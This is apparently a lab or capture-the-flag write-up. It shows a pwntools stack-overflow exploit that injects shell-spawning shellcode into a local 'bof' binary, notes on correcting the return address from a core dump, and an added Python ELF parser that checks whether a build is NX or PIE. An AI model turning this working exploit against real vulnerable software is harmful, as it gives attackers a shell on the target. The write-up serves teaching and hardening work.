```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: " + str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then, when exploiting it, it didn't work (because the stack address changed a bit).
I opened the generated core file (`gdb ./bof ./core`) and checked the real address of the start of the shellcode.
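The payload above only runs because the stack of `bof` is executable: returning into bytes placed on the stack faults as soon as the binary is marked NX. The following dependency-free Python is an added example, not code from the original write-up and not part of pwntools; it reads the ELF64 header and the `PT_GNU_STACK` program header directly so a defender can confirm that a build actually carries the NX marking (and whether it is PIE). The ELF images it inspects are constructed inline, header and program headers only, and the `gcc` flags named in the comments are assumptions about how such builds would be produced.

```python
import struct

# ELF constants (from the ELF specification and the Linux ELF loader)
PT_GNU_STACK = 0x6474E551  # program header whose p_flags record the requested stack permissions
PT_LOAD = 1
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
ET_EXEC, ET_DYN = 2, 3     # fixed-address executable vs. position-independent executable


def parse_elf64_protections(data: bytes) -> dict:
    """Read the ELF64 header and program headers and report PIE and stack-NX status."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only 64-bit little-endian images are handled here")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    gnu_stack_flags = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags

    # No PT_GNU_STACK entry means the kernel falls back to its architecture default,
    # which on x86-64 Linux is an executable stack, so "missing" is reported as NX disabled.
    nx = gnu_stack_flags is not None and not (gnu_stack_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "gnu_stack_present": gnu_stack_flags is not None,
        "nx": nx,
    }


def stack_shellcode_is_blocked(data: bytes) -> bool:
    """True when the image is marked NX, i.e. a return into code on the stack would fault."""
    return parse_elf64_protections(data)["nx"]


def build_test_image(e_type: int, stack_flags) -> bytes:
    """Constructed minimal ELF64 image (header + program headers, no code); sample input only."""
    phdrs = [struct.pack("<IIQQQQQQ", PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)]
    if stack_flags is not None:
        phdrs.append(struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10))
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, little-endian, version 1, SysV ABI
    header = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 62, 1,        # e_type, e_machine (x86-64), e_version
        0x401000,             # e_entry
        64, 0, 0,             # e_phoff (program headers follow the header), e_shoff, e_flags
        64, 56, len(phdrs),   # e_ehsize, e_phentsize, e_phnum
        64, 0, 0,             # e_shentsize, e_shnum, e_shstrndx
    )
    return header + b"".join(phdrs)


if __name__ == "__main__":
    # A build like the one attacked above (executable stack, no PIE) next to a hardened one.
    weak = build_test_image(ET_EXEC, PF_R | PF_W | PF_X)   # assumed: gcc -z execstack -no-pie
    hardened = build_test_image(ET_DYN, PF_R | PF_W)       # assumed: default toolchain output
    for name, image in (("weak", weak), ("hardened", hardened)):
        print(name, parse_elf64_protections(image))
```

For a real file, pwntools reports the same facts through `elf.nx`, `elf.pie` and `elf.checksec()`; the parser here exists so the check can run where pwntools is not installed and so the meaning of the NX bit (the `PF_X` flag of `PT_GNU_STACK`) is visible rather than hidden behind a library call.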